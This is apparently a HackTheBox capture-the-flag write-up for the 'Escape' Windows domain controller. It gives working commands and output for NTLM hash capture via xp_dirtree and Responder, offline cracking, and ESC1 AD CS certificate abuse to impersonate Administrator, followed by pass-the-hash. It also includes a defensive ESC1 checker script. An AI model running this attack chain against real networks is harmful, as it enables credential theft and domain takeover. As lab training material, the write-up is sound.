Introduction
Welcome to our new HackTheBox write-up! In this article, we will guide you through the steps we took to successfully compromise the targeted machine.
Escape is a medium-difficulty Windows machine.
External Recon
Let's do some recon!
Nmap scan
└─$ nmap 10.10.11.202 -A -T4 -sV -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 13:37 CET
Nmap scan report for 10.10.11.202
Host is up (0.029s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-04 20:37:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-04T20:08:39
|_Not valid after: 2053-03-04T20:08:39
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-04T20:39:01+00:00; +7h59m59s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
The scan already tells us a lot: the domain is sequel.htb and the host is dc.sequel.htb (from the LDAP certificate), so this is a domain controller; SQL Server 2019 listens on 1433 and WinRM on 5985; and the ssl-date lines show the target's clock about 8 hours ahead of ours, which will matter later for Kerberos.
DNS scan
└─$ dig srv sequel.htb @10.10.11.202
; <<>> DiG 9.18.10-2-Debian <<>> srv sequel.htb @10.10.11.202
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41881
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;sequel.htb. IN SRV
;; AUTHORITY SECTION:
sequel.htb. 3600 IN SOA dc.sequel.htb. hostmaster.sequel.htb. 132 900 600 86400 3600
No SRV records exist at the zone apex (Active Directory publishes its service records under the _msdcs, _tcp and _udp subdomains instead); the SOA in the authority section confirms dc.sequel.htb as the primary name server for sequel.htb.
AD recon
First, I checked whether anonymous (null session) login is allowed. We can confirm that with rpcclient.
└─$ rpcclient -U '' -N 10.10.11.202
rpcclient $>
It works: the null session is accepted. I then tried to enumerate users and groups with enum4linux, but unfortunately it returns nothing useful.
SMB recon
Using smbclient from Impacket with the guest account, we find some shares.
└─$ impacket-smbclient guest@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Public
SYSVOL
In the Public share, we find a PDF that describes SQL Server procedures. At the end of it we find some credentials!
Credentials: PublicUser:GuestUserCantWrite1
MS-SQL server
Since we know there is an MS-SQL server, I tried the newly acquired credentials on that service.
└─$ impacket-mssqlclient SEQUEL/PublicUser:GuestUserCantWrite1@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
It works! We have access to the database. First, I checked whether xp_cmdshell is enabled, but it is not.
🔎 If it were enabled, xp_cmdshell would let us execute operating-system commands on the target in the security context of the SQL Server service account.
Then I looked for more information about the database:
# Get MS-SQL version
SQL> select @@version
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
# Get databases name
SQL> SELECT name FROM master.dbo.sysdatabases;
master
tempdb
model
msdb
Initial access
Stealing NTLM hash
Using the Metasploit module admin/mssql/mssql_ntlm_stealer, I tried to capture the NTLM credentials of the SQL Server service account. The module calls the xp_dirtree stored procedure with a UNC path pointing at our host, which makes the service account authenticate to us over SMB; before running it, I start Responder on the VPN interface to answer that connection.
It works! Responder captures the NetNTLMv2 challenge-response of the service account. This is not the NT hash itself and cannot be used for pass-the-hash, but we can crack it offline with hashcat (mode 5600) to recover the password.
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
SQL_SVC::sequel:5ba7741884f371a1:3badc1217e9a080ac4[...]:REGGIE1234ronnie
And we get the following credentials: sql_svc:REGGIE1234ronnie
AD Recon v2
Using those credentials, we can access the other shares on the SMB server. I dumped every share we can read with DumpSMBShare from p0dalirius, but found nothing useful. I then checked for writable shares (impacket-psexec tests this before trying to upload its service binary), but they are all read-only.
└─$ impacket-psexec sequel/sql_svc:REGGIE1234ronnie@10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.11.202.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Public' is not writable.
[-] share 'SYSVOL' is not writable.
Then, using Impacket again, I enumerated all users of the domain with GetADUsers.
└─$ impacket-GetADUsers -all -dc-ip 10.10.11.202 sequel.htb/sql_svc
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Querying 10.10.11.202 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2022-11-18 22:13:16.520281 2023-03-04 21:08:53.658972
Guest <never> <never>
krbtgt 2022-11-18 18:12:10.132527 <never>
Tom.Henn 2022-11-18 22:13:12.991127 <never>
Brandon.Brown 2022-11-18 22:13:13.047440 <never>
Ryan.Cooper 2023-02-01 22:52:57.246550 2023-02-07 18:13:56.485457
sql_svc 2022-11-18 22:13:13.102329 2023-03-04 21:08:37.080951
James.Roberts 2022-11-18 22:13:13.133415 <never>
Nicole.Thompson 2022-11-18 22:13:13.163173 <never>
We get some new users! Ryan.Cooper stands out: unlike the other accounts created in November 2022, this one had its password changed on 2023-02-01 and has logged on since, so it is an account that is actually in use.
Log in as sql_svc
Since WinRM (port 5985) is open, we can connect to the target as sql_svc using evil-winrm.
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
*Evil-WinRM* PS C:\Users> cd Ryan.Cooper
*Evil-WinRM* PS C:\Users\Ryan.Cooper> ls
Access to the path 'C:\Users\Ryan.Cooper' is denied.
Here we find the home directory of Ryan.Cooper again, but access is denied.
Checking the root of C:\, we find a SQLServer directory.
*Evil-WinRM* PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
In that directory we find a Logs subdirectory containing a file named ERRORLOG.BAK. In that file we find the following entries:
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
Read together, these lines show a failed logon for 'sequel.htb\Ryan.Cooper' immediately followed, from the same client and within the same second, by a failed logon for a "user" named NuclearMosquito3 (error 18456, state 8 is SQL Server's code for a wrong password). That is the classic sign of a password typed into the username field. Trying the credentials Ryan.Cooper:NuclearMosquito3 works, and we are in! We can get the user flag :)
Path to the privesc
Local recon as Ryan.Cooper
Running winPEAS, we find some listening ports.
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 49708 0.0.0.0 0 Listening 2608 certsrv
TCP 0.0.0.0 49712 0.0.0.0 0 Listening 3100 dns
TCP 0.0.0.0 49767 0.0.0.0 0 Listening 5188 sqlservr
TCP 0.0.0.0 57877 0.0.0.0 0 Listening 1756 dfsrs
[...]
Here we find a process named certsrv, the Active Directory Certificate Services (AD CS) service: the domain controller is also an enterprise certificate authority.
With some research, I found that a certificate server can be abused for privilege escalation when parts of its configuration are wrong. The relevant material is the ad-certificates/domain-escalation page on HackTricks.
Exploiting certificate server
ADCS recon
First, we can use Certify.exe, a C# tool that enumerates and abuses misconfigurations in Active Directory Certificate Services (AD CS). The find /vulnerable action only lists the templates that match a known escalation pattern.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated Users S-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
The result shows that one of the certificate templates is vulnerable. The combination below is the ESC1 misconfiguration described in the Certified Pre-Owned research by Will Schroeder and Lee Christensen.
💡 Certificate templates in AD CS (Active Directory Certificate Services) are pre-configured templates that define the parameters of a particular type of certificate the certificate authority (CA) can issue.
Here, there are four important pieces of information:
Template Name: UserAuthentication: the name of the template;
msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT: the requester supplies the subject and subject alternative name of the certificate, so any user enrolling in this template can ask for a certificate in another user's name;
pkiextendedkeyusage: Client Authentication: certificates issued from this template can be used to authenticate to the domain (Kerberos PKINIT, Schannel);
Enrollment Rights: sequel\Domain Users: any domain user can request certificates based on this template.
Two further details make it exploitable without any help: Authorized Signatures Required is 0 and mspki-enrollment-flag does not contain PEND_ALL_REQUESTS (manager approval), so the CA issues the certificate immediately without anyone reviewing the supplied name. So we can request a certificate for another user using that template. Let's try to exploit it!
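To turn those observations into a repeatable check, here is an added example (not code from the original write-up or from Certify) that parses a template block from Certify's find output and tests the five ESC1 conditions from the Certified Pre-Owned paper: low-privileged enrollment rights, no manager approval, no authorized signatures, an EKU that allows domain authentication, and ENROLLEE_SUPPLIES_SUBJECT. The first template text is copied from the output above (object-control lines omitted); the second is a constructed "fixed" version of the same template with manager approval required. The set of groups treated as low-privileged is an assumption to adjust per environment.

```python
import re

# Principals that make a template reachable by an ordinary account (assumed list; extend as needed).
LOW_PRIV_GROUPS = {"domain users", "authenticated users", "domain computers", "everyone", "users"}
# EKUs that let the certificate be used to log on to the domain (an empty EKU list also counts).
AUTH_EKUS = {"client authentication", "pkinit client authentication", "smart card logon", "any purpose"}


def parse_certify_template(text: str) -> dict:
    """Turn one template block of 'Certify.exe find' output into {lowercased key: [values]}.
    Lines without ' : ' continue the previous key (Certify prints one principal per line)."""
    props, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("Permissions", "Enrollment Permissions", "Object Control Permissions"):
            continue
        if " : " in line:
            key, value = (part.strip() for part in line.split(" : ", 1))
            key = key.lower()
            props[key] = [value] if value else []
        elif key:
            props[key].append(line)
    return props


def principals(values) -> set:
    """'sequel\\Domain Users   S-1-5-21-...-513' -> 'domain users'."""
    return {re.sub(r"\s+S-1-[\d-]+$", "", v).split("\\")[-1].strip().lower() for v in values}


def esc1_conditions(props: dict) -> dict:
    """Evaluate each ESC1 condition separately so a report can say which one to fix."""
    name_flags = props.get("mspki-certificate-name-flag", [""])[0]
    enroll_flags = props.get("mspki-enrollment-flag", [""])[0]
    eku_field = props.get("pkiextendedkeyusage", [""])[0]
    ekus = {e.strip().lower() for e in eku_field.split(",") if e.strip()}
    signatures = int(props.get("authorized signatures required", ["0"])[0])
    enrollers = principals(props.get("enrollment rights", []))
    return {
        "low-privileged principals can enroll": bool(enrollers & LOW_PRIV_GROUPS),
        "no manager approval (PEND_ALL_REQUESTS unset)": "PEND_ALL_REQUESTS" not in enroll_flags,
        "no authorized signatures required": signatures == 0,
        "EKU allows domain authentication": not ekus or bool(ekus & AUTH_EKUS),
        "requester supplies the subject (ENROLLEE_SUPPLIES_SUBJECT)": "ENROLLEE_SUPPLIES_SUBJECT" in name_flags,
    }


def is_esc1(props: dict) -> bool:
    return all(esc1_conditions(props).values())


# Template block as printed by Certify on the box (object-control lines left out; not part of ESC1).
VULNERABLE_TEMPLATE = r"""
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag           : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
"""
# Constructed fix: the same template with CA certificate manager approval required.
FIXED_TEMPLATE = VULNERABLE_TEMPLATE.replace(
    "INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS",
    "INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, PEND_ALL_REQUESTS")

if __name__ == "__main__":
    for label, text in (("as found", VULNERABLE_TEMPLATE), ("with manager approval", FIXED_TEMPLATE)):
        props = parse_certify_template(text)
        print(f"{props['template name'][0]} {label}: ESC1 = {is_esc1(props)}")
        for condition, met in esc1_conditions(props).items():
            print(f"  [{'x' if met else ' '}] {condition}")
```

Certify's /vulnerable filter covers more patterns (ESC2 to ESC4 and others); this reproduces ESC1 only. Either clearing ENROLLEE_SUPPLIES_SUBJECT or requiring manager approval, as in the constructed second block, breaks the chain, and reporting every condition separately shows which one a change actually removed.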
Requesting a new certificate
Again using Certify.exe, we can request a new certificate. We need to provide the name of the CA, which can be found in the previous command result (dc.sequel.htb\sequel-DC-CA), the name of the template (UserAuthentication), and the name of the user we want to impersonate. /altname:Administrator places Administrator as a user principal name in the subject alternative name of the request, which is the name the KDC maps the certificate to when we later authenticate with it.
🔎 Reminder: we can supply another user's name because ENROLLEE_SUPPLIES_SUBJECT is set for that template.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 20
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----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-----END CERTIFICATE-----
The command gives us a private key and a certificate, which we save (both PEM blocks together) in a file named cert.pem.
Getting a TGT
Now we will use Certipy to request a TGT, authenticating with the certificate. To do so, we first need to convert the certificate and key to PKCS#12 (.pfx) format, which is what Certipy expects. We can convert them with openssl.
# get cert.pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
openssl prompts for an export password; leave it empty, because the commands below pass the PFX without a password (gettgtpkinit.py explicitly, with -pfx-pass "").
We can now ask for a TGT. certipy auth performs Kerberos PKINIT pre-authentication with the certificate, obtains a TGT for the name carried in the certificate, and then uses that TGT to recover the account's NT hash (the same steps the Rubeus/PKINITtools path below does by hand).
└─$ certipy auth -pfx cert.pfx -dc-ip 10.10.11.202 -u 'Administrator' -domain sequel.htb
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
💡 If you get a clock skew error, your host's clock is too far from the DC's: Kerberos rejects requests whose timestamp differs from the KDC's by more than the allowed skew (5 minutes by default), and the nmap scan already showed the target about 8 hours ahead of us. To fix it you can try the following commands:
Using ntpdate: sudo ntpdate -u <AD_IP>
Using faketime: faketime '<timestamp>' <command>
Using net time: sudo net time set -S <DC_IP>
We now have the NT hash of Administrator, and we can pass it to WinRM.
# pass the hash
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
We can get the root flag :)
Another solution using Rubeus
If you cannot or do not want to use Certipy, you can do the same with Rubeus. We start by requesting the TGT.
# get TGT
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /outfile:admin_tgt.kirbi
Once we have the TGT, it is possible to recover the NT hash with it. We start by converting admin_tgt.kirbi to the ccache format using ticketConverter from Impacket.
# convert admin_tgt.kirbi to ccache
└─$ impacket-ticketConverter admin_tgt.kirbi admin.ccache
Next, we export the environment variable KRB5CCNAME with the path to our ticket: export KRB5CCNAME="admin.ccache"
Then we pass cert.pfx and admin.ccache to gettgtpkinit.py from PKINITtools. Note that gettgtpkinit.py performs its own PKINIT request and writes the resulting TGT to the ccache file named on its command line, so it does not actually depend on the Rubeus ticket; what the next step needs is the AS-REP encryption key that only this tool prints.
# PKINIT pre-authentication
└─$ python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "" "sequel.htb/Administrator" "admin.ccache" -dc-ip 10.10.11.202
2023-03-05 09:09:23,448 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-03-05 09:09:23,529 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-03-05 09:09:23,593 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-03-05 09:09:23,593 minikerberos INFO e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86
INFO:minikerberos:e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86
2023-03-05 09:09:23,597 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
This performs PKINIT pre-authentication with the certificate. The tool also prints the AS-REP encryption key, which we pass to getnthash.py (also from PKINITtools) to get the NT hash: it uses the TGT in KRB5CCNAME to request a user-to-user service ticket for the account itself, and the PAC inside that ticket carries the NT hash in its PAC_CREDENTIAL_INFO buffer, encrypted with the AS-REP key.
# Extract NT from TGT
└─$ python3 getnthash.py -key e0abbd319bd9ab00b1d21e1850ec7b30c9430f103a35a39f92b9f05b38a5cf86 "sequel.htb/Administrator" -dc-ip 10.10.11.202
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a52f78e4c751e5f5e17e1e9f3e58f4ee
We can then use the hash to authenticate :)
💡 Commands are taken from The Hacker Recipes